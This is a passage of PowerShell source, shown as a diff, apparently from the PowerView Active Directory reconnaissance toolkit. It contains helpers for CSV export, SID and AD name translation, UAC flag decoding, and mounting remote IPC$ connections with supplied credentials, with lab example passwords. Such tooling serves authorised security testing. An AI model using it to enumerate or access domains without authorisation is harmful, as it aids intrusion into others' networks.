if ($PSBoundParameters['OutputObject']) { + $Section = $Section.Replace(' ', '') + $SectionObject = New-Object PSObject + $IniObject | Add-Member Noteproperty $Section $SectionObject + } + else { + $IniObject[$Section] = @{} + } + $CommentCount = 0 + } + "^(;.*)$" # Comment + { + $Value = $matches[1].Trim() + $CommentCount = $CommentCount + 1 + $Name = 'Comment' + $CommentCount + if ($PSBoundParameters['OutputObject']) { + $Name = $Name.Replace(' ', '') + $IniObject.$Section | Add-Member Noteproperty $Name $Value + } + else { + $IniObject[$Section][$Name] = $Value + } + } + "(.+?)\s*=(.*)" # Key + { + $Name, $Value = $matches[1..2] + $Name = $Name.Trim() + $Values = $Value.split(',') | ForEach-Object { $_.Trim() } + + # if ($Values -isnot [System.Array]) { $Values = @($Values) } + + if ($PSBoundParameters['OutputObject']) { + $Name = $Name.Replace(' ', '') + $IniObject.$Section | Add-Member Noteproperty $Name $Values + } + else { + $IniObject[$Section][$Name] = $Values + } + } + } + $IniObject + } + } + } + + END { + # remove the IPC$ mappings + $MappedComputers.Keys | Remove-RemoteConnection + } +} + + +function Export-PowerViewCSV { +<# +.SYNOPSIS + +Converts objects into a series of comma-separated (CSV) strings and saves the +strings in a CSV file in a thread-safe manner. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +This helper exports an -InputObject to a .csv in a thread-safe manner +using a mutex. This is so the various multi-threaded functions in +PowerView has a thread-safe way to export output to the same file. +Uses .NET IO.FileStream/IO.StreamWriter objects for speed. + +Originally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590 + +.PARAMETER InputObject + +Specifies the objects to export as CSV strings. + +.PARAMETER Path + +Specifies the path to the CSV output file. + +.PARAMETER Delimiter + +Specifies a delimiter to separate the property values. 
The default is a comma (,) + +.PARAMETER Append + +Indicates that this cmdlet adds the CSV output to the end of the specified file. +Without this parameter, Export-PowerViewCSV replaces the file contents without warning. + +.EXAMPLE + +Get-DomainUser | Export-PowerViewCSV -Path "users.csv" + +.EXAMPLE + +Get-DomainUser | Export-PowerViewCSV -Path "users.csv" -Append -Delimiter '|' + +.INPUTS + +PSObject + +Accepts one or more PSObjects on the pipeline. + +.LINK + +http://poshcode.org/1590 +http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [System.Management.Automation.PSObject[]] + $InputObject, + + [Parameter(Mandatory = $True, Position = 1)] + [ValidateNotNullOrEmpty()] + [String] + $Path, + + [Parameter(Position = 2)] + [ValidateNotNullOrEmpty()] + [Char] + $Delimiter = ',', + + [Switch] + $Append + ) + + BEGIN { + $OutputPath = [IO.Path]::GetFullPath($PSBoundParameters['Path']) + $Exists = [System.IO.File]::Exists($OutputPath) + + # mutex so threaded code doesn't stomp on the output file + $Mutex = New-Object System.Threading.Mutex $False,'CSVMutex' + $Null = $Mutex.WaitOne() + + if ($PSBoundParameters['Append']) { + $FileMode = [System.IO.FileMode]::Append + } + else { + $FileMode = [System.IO.FileMode]::Create + $Exists = $False + } + + $CSVStream = New-Object IO.FileStream($OutputPath, $FileMode, [System.IO.FileAccess]::Write, [IO.FileShare]::Read) + $CSVWriter = New-Object System.IO.StreamWriter($CSVStream) + $CSVWriter.AutoFlush = $True + } + + PROCESS { + ForEach ($Entry in $InputObject) { + $ObjectCSV = ConvertTo-Csv -InputObject $Entry -Delimiter $Delimiter -NoTypeInformation + + if (-not $Exists) { + # output the object field names as well + $ObjectCSV | ForEach-Object { $CSVWriter.WriteLine($_) } + $Exists = $True + } + else 
{ + # only output object field data + $ObjectCSV[1..($ObjectCSV.Length-1)] | ForEach-Object { $CSVWriter.WriteLine($_) } + } + } + } + + END { + $Mutex.ReleaseMutex() + $CSVWriter.Dispose() + $CSVStream.Dispose() + } +} + + +function Resolve-IPAddress { +<# +.SYNOPSIS + +Resolves a given hostename to its associated IPv4 address. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Resolves a given hostename to its associated IPv4 address using +[Net.Dns]::GetHostEntry(). If no hostname is provided, the default +is the IP address of the localhost. + +.EXAMPLE + +Resolve-IPAddress -ComputerName SERVER + +.EXAMPLE + +@("SERVER1", "SERVER2") | Resolve-IPAddress + +.INPUTS + +String + +Accepts one or more IP address strings on the pipeline. + +.OUTPUTS + +System.Management.Automation.PSCustomObject + +A custom PSObject with the ComputerName and IPAddress. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.Management.Automation.PSCustomObject')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = $Env:COMPUTERNAME + ) + + PROCESS { + ForEach ($Computer in $ComputerName) { + try { + @(([Net.Dns]::GetHostEntry($Computer)).AddressList) | ForEach-Object { + if ($_.AddressFamily -eq 'InterNetwork') { + $Out = New-Object PSObject + $Out | Add-Member Noteproperty 'ComputerName' $Computer + $Out | Add-Member Noteproperty 'IPAddress' $_.IPAddressToString + $Out + } + } + } + catch { + Write-Verbose "[Resolve-IPAddress] Could not resolve $Computer to an IP Address." + } + } + } +} + + +function ConvertTo-SID { +<# +.SYNOPSIS + +Converts a given user/group name to a security identifier (SID). 
+ +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Convert-ADName, Get-DomainObject, Get-Domain + +.DESCRIPTION + +Converts a "DOMAIN\username" syntax to a security identifier (SID) +using System.Security.Principal.NTAccount's translate function. If alternate +credentials are supplied, then Get-ADObject is used to try to map the name +to a security identifier. + +.PARAMETER ObjectName + +The user/group name to convert, can be 'user' or 'DOMAIN\user' format. + +.PARAMETER Domain + +Specifies the domain to use for the translation, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to for the translation. + +.PARAMETER Credential + +Specifies an alternate credential to use for the translation. + +.EXAMPLE + +ConvertTo-SID 'DEV\dfm' + +.EXAMPLE + +'DEV\dfm','DEV\krbtgt' | ConvertTo-SID + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +'TESTLAB\dfm' | ConvertTo-SID -Credential $Cred + +.INPUTS + +String + +Accepts one or more username specification strings on the pipeline. + +.OUTPUTS + +String + +A string representing the SID of the translated name. 
+#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([String])] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name', 'Identity')] + [String[]] + $ObjectName, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $DomainSearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $DomainSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $DomainSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $DomainSearcherArguments['Credential'] = $Credential } + } + + PROCESS { + ForEach ($Object in $ObjectName) { + $Object = $Object -Replace '/','\' + + if ($PSBoundParameters['Credential']) { + $DN = Convert-ADName -Identity $Object -OutputType 'DN' @DomainSearcherArguments + if ($DN) { + $UserDomain = $DN.SubString($DN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' 
+ $UserName = $DN.Split(',')[0].split('=')[1] + + $DomainSearcherArguments['Identity'] = $UserName + $DomainSearcherArguments['Domain'] = $UserDomain + $DomainSearcherArguments['Properties'] = 'objectsid' + Get-DomainObject @DomainSearcherArguments | Select-Object -Expand objectsid + } + } + else { + try { + if ($Object.Contains('\')) { + $Domain = $Object.Split('\')[0] + $Object = $Object.Split('\')[1] + } + elseif (-not $PSBoundParameters['Domain']) { + $DomainSearcherArguments = @{} + $Domain = (Get-Domain @DomainSearcherArguments).Name + } + + $Obj = (New-Object System.Security.Principal.NTAccount($Domain, $Object)) + $Obj.Translate([System.Security.Principal.SecurityIdentifier]).Value + } + catch { + Write-Verbose "[ConvertTo-SID] Error converting $Domain\$Object : $_" + } + } + } + } +} + + +function ConvertFrom-SID { +<# +.SYNOPSIS + +Converts a security identifier (SID) to a group/user name. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Convert-ADName + +.DESCRIPTION + +Converts a security identifier string (SID) to a group/user name +using Convert-ADName. + +.PARAMETER ObjectSid + +Specifies one or more SIDs to convert. + +.PARAMETER Domain + +Specifies the domain to use for the translation, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to for the translation. + +.PARAMETER Credential + +Specifies an alternate credential to use for the translation. + +.EXAMPLE + +ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 + +TESTLAB\harmj0y + +.EXAMPLE + +"S-1-5-21-890171859-3433809279-3366196753-1107", "S-1-5-21-890171859-3433809279-3366196753-1108", "S-1-5-32-562" | ConvertFrom-SID + +TESTLAB\WINDOWS2$ +TESTLAB\harmj0y +BUILTIN\Distributed COM Users + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred + +TESTLAB\harmj0y + +.INPUTS + +String + +Accepts one or more SID strings on the pipeline. + +.OUTPUTS + +String + +The converted DOMAIN\username. +#> + + [OutputType([String])] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('SID')] + [ValidatePattern('^S-1-.*')] + [String[]] + $ObjectSid, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $ADNameArguments = @{} + if ($PSBoundParameters['Domain']) { $ADNameArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential } + } + + PROCESS { + ForEach ($TargetSid in $ObjectSid) { + $TargetSid = $TargetSid.trim('*') + try { + # try to resolve any built-in SIDs first - https://support.microsoft.com/en-us/kb/243330 + Switch ($TargetSid) { + 'S-1-0' { 'Null Authority' } + 'S-1-0-0' { 'Nobody' } + 'S-1-1' { 'World Authority' } + 'S-1-1-0' { 'Everyone' } + 'S-1-2' { 'Local Authority' } + 'S-1-2-0' { 'Local' } + 'S-1-2-1' { 'Console Logon ' } + 'S-1-3' { 'Creator Authority' } + 'S-1-3-0' { 'Creator Owner' } + 'S-1-3-1' { 'Creator Group' } + 'S-1-3-2' { 'Creator Owner Server' } + 'S-1-3-3' { 'Creator Group Server' } + 'S-1-3-4' { 'Owner Rights' } + 'S-1-4' { 'Non-unique Authority' } + 'S-1-5' { 'NT Authority' } + 'S-1-5-1' { 'Dialup' } + 'S-1-5-2' { 'Network' } + 'S-1-5-3' { 'Batch' } + 'S-1-5-4' { 'Interactive' } + 'S-1-5-6' { 'Service' } + 'S-1-5-7' { 'Anonymous' } + 
'S-1-5-8' { 'Proxy' } + 'S-1-5-9' { 'Enterprise Domain Controllers' } + 'S-1-5-10' { 'Principal Self' } + 'S-1-5-11' { 'Authenticated Users' } + 'S-1-5-12' { 'Restricted Code' } + 'S-1-5-13' { 'Terminal Server Users' } + 'S-1-5-14' { 'Remote Interactive Logon' } + 'S-1-5-15' { 'This Organization ' } + 'S-1-5-17' { 'This Organization ' } + 'S-1-5-18' { 'Local System' } + 'S-1-5-19' { 'NT Authority' } + 'S-1-5-20' { 'NT Authority' } + 'S-1-5-80-0' { 'All Services ' } + 'S-1-5-32-544' { 'BUILTIN\Administrators' } + 'S-1-5-32-545' { 'BUILTIN\Users' } + 'S-1-5-32-546' { 'BUILTIN\Guests' } + 'S-1-5-32-547' { 'BUILTIN\Power Users' } + 'S-1-5-32-548' { 'BUILTIN\Account Operators' } + 'S-1-5-32-549' { 'BUILTIN\Server Operators' } + 'S-1-5-32-550' { 'BUILTIN\Print Operators' } + 'S-1-5-32-551' { 'BUILTIN\Backup Operators' } + 'S-1-5-32-552' { 'BUILTIN\Replicators' } + 'S-1-5-32-554' { 'BUILTIN\Pre-Windows 2000 Compatible Access' } + 'S-1-5-32-555' { 'BUILTIN\Remote Desktop Users' } + 'S-1-5-32-556' { 'BUILTIN\Network Configuration Operators' } + 'S-1-5-32-557' { 'BUILTIN\Incoming Forest Trust Builders' } + 'S-1-5-32-558' { 'BUILTIN\Performance Monitor Users' } + 'S-1-5-32-559' { 'BUILTIN\Performance Log Users' } + 'S-1-5-32-560' { 'BUILTIN\Windows Authorization Access Group' } + 'S-1-5-32-561' { 'BUILTIN\Terminal Server License Servers' } + 'S-1-5-32-562' { 'BUILTIN\Distributed COM Users' } + 'S-1-5-32-569' { 'BUILTIN\Cryptographic Operators' } + 'S-1-5-32-573' { 'BUILTIN\Event Log Readers' } + 'S-1-5-32-574' { 'BUILTIN\Certificate Service DCOM Access' } + 'S-1-5-32-575' { 'BUILTIN\RDS Remote Access Servers' } + 'S-1-5-32-576' { 'BUILTIN\RDS Endpoint Servers' } + 'S-1-5-32-577' { 'BUILTIN\RDS Management Servers' } + 'S-1-5-32-578' { 'BUILTIN\Hyper-V Administrators' } + 'S-1-5-32-579' { 'BUILTIN\Access Control Assistance Operators' } + 'S-1-5-32-580' { 'BUILTIN\Access Control Assistance Operators' } + Default { + Convert-ADName -Identity $TargetSid @ADNameArguments + } + } + 
} + catch { + Write-Verbose "[ConvertFrom-SID] Error converting SID '$TargetSid' : $_" + } + } + } +} + + +function Convert-ADName { +<# +.SYNOPSIS + +Converts Active Directory object names between a variety of formats. + +Author: Bill Stewart, Pasquale Lantella +Modifications: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +This function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK) +and translates Active Directory names between various formats using the NameTranslate COM object. + +.PARAMETER Identity + +Specifies the Active Directory object name to translate, of the following form: + + DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com' + Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn' + NT4 domain\username; e.g., 'fabrikam\pflynn' + Display display name, e.g. 'pflynn' + DomainSimple simple domain name format, e.g. 'pflynn@fabrikam.com' + EnterpriseSimple simple enterprise name format, e.g. 'pflynn@fabrikam.com' + GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}' + UPN user principal name; e.g., 'pflynn@fabrikam.com' + CanonicalEx extended canonical name format + SPN service principal name format; e.g. 'HTTP/kairomac.contoso.com' + SID Security Identifier; e.g., 'S-1-5-21-12986231-600641547-709122288-57999' + +.PARAMETER OutputType + +Specifies the output name type you want to convert to, which must be one of the following: + + DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com' + Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn' + NT4 domain\username; e.g., 'fabrikam\pflynn' + Display display name, e.g. 'pflynn' + DomainSimple simple domain name format, e.g. 'pflynn@fabrikam.com' + EnterpriseSimple simple enterprise name format, e.g. 
'pflynn@fabrikam.com' + GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}' + UPN user principal name; e.g., 'pflynn@fabrikam.com' + CanonicalEx extended canonical name format, e.g. 'fabrikam.com/Users/Phineas Flynn' + SPN service principal name format; e.g. 'HTTP/kairomac.contoso.com' + +.PARAMETER Domain + +Specifies the domain to use for the translation, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to for the translation. + +.PARAMETER Credential + +Specifies an alternate credential to use for the translation. + +.EXAMPLE + +Convert-ADName -Identity "TESTLAB\harmj0y" + +harmj0y@testlab.local + +.EXAMPLE + +"TESTLAB\krbtgt", "CN=Administrator,CN=Users,DC=testlab,DC=local" | Convert-ADName -OutputType Canonical + +testlab.local/Users/krbtgt +testlab.local/Users/Administrator + +.EXAMPLE + +Convert-ADName -OutputType dn -Identity 'TESTLAB\harmj0y' -Server PRIMARY.testlab.local + +CN=harmj0y,CN=Users,DC=testlab,DC=local + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +'S-1-5-21-890171859-3433809279-3366196753-1108' | Convert-ADNAme -Credential $Cred + +TESTLAB\harmj0y + +.INPUTS + +String + +Accepts one or more objects name strings on the pipeline. + +.OUTPUTS + +String + +Outputs a string representing the converted name. 
+ +.LINK + +http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats +https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67 +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [OutputType([String])] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name', 'ObjectName')] + [String[]] + $Identity, + + [String] + [ValidateSet('DN', 'Canonical', 'NT4', 'Display', 'DomainSimple', 'EnterpriseSimple', 'GUID', 'Unknown', 'UPN', 'CanonicalEx', 'SPN')] + $OutputType, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $NameTypes = @{ + 'DN' = 1 # CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com + 'Canonical' = 2 # fabrikam.com/Engineers/Phineas Flynn + 'NT4' = 3 # fabrikam\pflynn + 'Display' = 4 # pflynn + 'DomainSimple' = 5 # pflynn@fabrikam.com + 'EnterpriseSimple' = 6 # pflynn@fabrikam.com + 'GUID' = 7 # {95ee9fff-3436-11d1-b2b0-d15ae3ac8436} + 'Unknown' = 8 # unknown type - let the server do translation + 'UPN' = 9 # pflynn@fabrikam.com + 'CanonicalEx' = 10 # fabrikam.com/Users/Phineas Flynn + 'SPN' = 11 # HTTP/kairomac.contoso.com + 'SID' = 12 # S-1-5-21-12986231-600641547-709122288-57999 + } + + # accessor functions from Bill Stewart to simplify calls to NameTranslate + function Invoke-Method([__ComObject] $Object, [String] $Method, $Parameters) { + $Output = $Null + $Output = $Object.GetType().InvokeMember($Method, 'InvokeMethod', $NULL, $Object, $Parameters) + Write-Output $Output + } + + function Get-Property([__ComObject] $Object, [String] $Property) { + $Object.GetType().InvokeMember($Property, 
'GetProperty', $NULL, $Object, $NULL) + } + + function Set-Property([__ComObject] $Object, [String] $Property, $Parameters) { + [Void] $Object.GetType().InvokeMember($Property, 'SetProperty', $NULL, $Object, $Parameters) + } + + # https://msdn.microsoft.com/en-us/library/aa772266%28v=vs.85%29.aspx + if ($PSBoundParameters['Server']) { + $ADSInitType = 2 + $InitName = $Server + } + elseif ($PSBoundParameters['Domain']) { + $ADSInitType = 1 + $InitName = $Domain + } + elseif ($PSBoundParameters['Credential']) { + $Cred = $Credential.GetNetworkCredential() + $ADSInitType = 1 + $InitName = $Cred.Domain + } + else { + # if no domain or server is specified, default to GC initialization + $ADSInitType = 3 + $InitName = $Null + } + } + + PROCESS { + ForEach ($TargetIdentity in $Identity) { + if (-not $PSBoundParameters['OutputType']) { + if ($TargetIdentity -match "^[A-Za-z]+\\[A-Za-z ]+") { + $ADSOutputType = $NameTypes['DomainSimple'] + } + else { + $ADSOutputType = $NameTypes['NT4'] + } + } + else { + $ADSOutputType = $NameTypes[$OutputType] + } + + $Translate = New-Object -ComObject NameTranslate + + if ($PSBoundParameters['Credential']) { + try { + $Cred = $Credential.GetNetworkCredential() + + Invoke-Method $Translate 'InitEx' ( + $ADSInitType, + $InitName, + $Cred.UserName, + $Cred.Domain, + $Cred.Password + ) + } + catch { + Write-Verbose "[Convert-ADName] Error initializing translation for '$Identity' using alternate credentials : $_" + } + } + else { + try { + $Null = Invoke-Method $Translate 'Init' ( + $ADSInitType, + $InitName + ) + } + catch { + Write-Verbose "[Convert-ADName] Error initializing translation for '$Identity' : $_" + } + } + + # always chase all referrals + Set-Property $Translate 'ChaseReferral' (0x60) + + try { + # 8 = Unknown name type -> let the server do the work for us + $Null = Invoke-Method $Translate 'Set' (8, $TargetIdentity) + Invoke-Method $Translate 'Get' ($ADSOutputType) + } + catch 
[System.Management.Automation.MethodInvocationException] { + Write-Verbose "[Convert-ADName] Error translating '$TargetIdentity' : $($_.Exception.InnerException.Message)" + } + } + } +} + + +function ConvertFrom-UACValue { +<# +.SYNOPSIS + +Converts a UAC int value to human readable form. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +This function will take an integer that represents a User Account +Control (UAC) binary blob and will covert it to an ordered +dictionary with each bitwise value broken out. By default only values +set are displayed- the -ShowAll switch will display all values with +a + next to the ones set. + +.PARAMETER Value + +Specifies the integer UAC value to convert. + +.PARAMETER ShowAll + +Switch. Signals ConvertFrom-UACValue to display all UAC values, with a + indicating the value is currently set. + +.EXAMPLE + +ConvertFrom-UACValue -Value 66176 + +Name Value +---- ----- +ENCRYPTED_TEXT_PWD_ALLOWED 128 +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 + +.EXAMPLE + +Get-DomainUser harmj0y | ConvertFrom-UACValue + +Name Value +---- ----- +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 + +.EXAMPLE + +Get-DomainUser harmj0y | ConvertFrom-UACValue -ShowAll + +Name Value +---- ----- +SCRIPT 1 +ACCOUNTDISABLE 2 +HOMEDIR_REQUIRED 8 +LOCKOUT 16 +PASSWD_NOTREQD 32 +PASSWD_CANT_CHANGE 64 +ENCRYPTED_TEXT_PWD_ALLOWED 128 +TEMP_DUPLICATE_ACCOUNT 256 +NORMAL_ACCOUNT 512+ +INTERDOMAIN_TRUST_ACCOUNT 2048 +WORKSTATION_TRUST_ACCOUNT 4096 +SERVER_TRUST_ACCOUNT 8192 +DONT_EXPIRE_PASSWORD 65536+ +MNS_LOGON_ACCOUNT 131072 +SMARTCARD_REQUIRED 262144 +TRUSTED_FOR_DELEGATION 524288 +NOT_DELEGATED 1048576 +USE_DES_KEY_ONLY 2097152 +DONT_REQ_PREAUTH 4194304 +PASSWORD_EXPIRED 8388608 +TRUSTED_TO_AUTH_FOR_DELEGATION 16777216 +PARTIAL_SECRETS_ACCOUNT 67108864 + +.INPUTS + +Int + +Accepts an integer representing a UAC binary blob. 
+ +.OUTPUTS + +System.Collections.Specialized.OrderedDictionary + +An ordered dictionary with the converted UAC fields. + +.LINK + +https://support.microsoft.com/en-us/kb/305144 +#> + + [OutputType('System.Collections.Specialized.OrderedDictionary')] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('UAC', 'useraccountcontrol')] + [Int] + $Value, + + [Switch] + $ShowAll + ) + + BEGIN { + # values from https://support.microsoft.com/en-us/kb/305144 + $UACValues = New-Object System.Collections.Specialized.OrderedDictionary + $UACValues.Add("SCRIPT", 1) + $UACValues.Add("ACCOUNTDISABLE", 2) + $UACValues.Add("HOMEDIR_REQUIRED", 8) + $UACValues.Add("LOCKOUT", 16) + $UACValues.Add("PASSWD_NOTREQD", 32) + $UACValues.Add("PASSWD_CANT_CHANGE", 64) + $UACValues.Add("ENCRYPTED_TEXT_PWD_ALLOWED", 128) + $UACValues.Add("TEMP_DUPLICATE_ACCOUNT", 256) + $UACValues.Add("NORMAL_ACCOUNT", 512) + $UACValues.Add("INTERDOMAIN_TRUST_ACCOUNT", 2048) + $UACValues.Add("WORKSTATION_TRUST_ACCOUNT", 4096) + $UACValues.Add("SERVER_TRUST_ACCOUNT", 8192) + $UACValues.Add("DONT_EXPIRE_PASSWORD", 65536) + $UACValues.Add("MNS_LOGON_ACCOUNT", 131072) + $UACValues.Add("SMARTCARD_REQUIRED", 262144) + $UACValues.Add("TRUSTED_FOR_DELEGATION", 524288) + $UACValues.Add("NOT_DELEGATED", 1048576) + $UACValues.Add("USE_DES_KEY_ONLY", 2097152) + $UACValues.Add("DONT_REQ_PREAUTH", 4194304) + $UACValues.Add("PASSWORD_EXPIRED", 8388608) + $UACValues.Add("TRUSTED_TO_AUTH_FOR_DELEGATION", 16777216) + $UACValues.Add("PARTIAL_SECRETS_ACCOUNT", 67108864) + } + + PROCESS { + $ResultUACValues = New-Object System.Collections.Specialized.OrderedDictionary + + if ($ShowAll) { + ForEach ($UACValue in $UACValues.GetEnumerator()) { + if ( ($Value -band $UACValue.Value) -eq $UACValue.Value) { + $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)+") + } + else { + $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)") + } + } + } + 
else { + ForEach ($UACValue in $UACValues.GetEnumerator()) { + if ( ($Value -band $UACValue.Value) -eq $UACValue.Value) { + $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)") + } + } + } + $ResultUACValues + } +} + + +function Get-PrincipalContext { +<# +.SYNOPSIS + +Helper to take an Identity and return a DirectoryServices.AccountManagement.PrincipalContext +and simplified identity. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.PARAMETER Identity + +A group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202), +or a DOMAIN\username identity. + +.PARAMETER Domain + +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. 
+#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True)] + [Alias('GroupName', 'GroupIdentity')] + [String] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + Add-Type -AssemblyName System.DirectoryServices.AccountManagement + + try { + if ($PSBoundParameters['Domain'] -or ($Identity -match '.+\\.+')) { + if ($Identity -match '.+\\.+') { + # DOMAIN\groupname + $ConvertedIdentity = $Identity | Convert-ADName -OutputType Canonical + if ($ConvertedIdentity) { + $ConnectTarget = $ConvertedIdentity.SubString(0, $ConvertedIdentity.IndexOf('/')) + $ObjectIdentity = $Identity.Split('\')[1] + Write-Verbose "[Get-PrincipalContext] Binding to domain '$ConnectTarget'" + } + } + else { + $ObjectIdentity = $Identity + Write-Verbose "[Get-PrincipalContext] Binding to domain '$Domain'" + $ConnectTarget = $Domain + } + + if ($PSBoundParameters['Credential']) { + Write-Verbose '[Get-PrincipalContext] Using alternate credentials' + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $ConnectTarget, $Credential.UserName, $Credential.GetNetworkCredential().Password) + } + else { + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $ConnectTarget) + } + } + else { + if ($PSBoundParameters['Credential']) { + Write-Verbose '[Get-PrincipalContext] Using alternate credentials' + $DomainName = Get-Domain | Select-Object -ExpandProperty Name + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList 
([System.DirectoryServices.AccountManagement.ContextType]::Domain, $DomainName, $Credential.UserName, $Credential.GetNetworkCredential().Password) + } + else { + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain) + } + $ObjectIdentity = $Identity + } + + $Out = New-Object PSObject + $Out | Add-Member Noteproperty 'Context' $Context + $Out | Add-Member Noteproperty 'Identity' $ObjectIdentity + $Out + } + catch { + Write-Warning "[Get-PrincipalContext] Error creating binding for object ('$Identity') context : $_" + } +} + + +function Add-RemoteConnection { +<# +.SYNOPSIS + +Pseudo "mounts" a connection to a remote path using the specified +credential object, allowing for access of remote resources. If a -Path isn't +specified, a -ComputerName is required to pseudo-mount IPC$. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +.DESCRIPTION + +This function uses WNetAddConnection2W to make a 'temporary' (i.e. not saved) connection +to the specified remote -Path (\\UNC\share) with the alternate credentials specified in the +-Credential object. If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC$. + +To destroy the connection, use Remove-RemoteConnection with the same specified \\UNC\share path +or -ComputerName. + +.PARAMETER ComputerName + +Specifies the system to add a \\ComputerName\IPC$ connection for. + 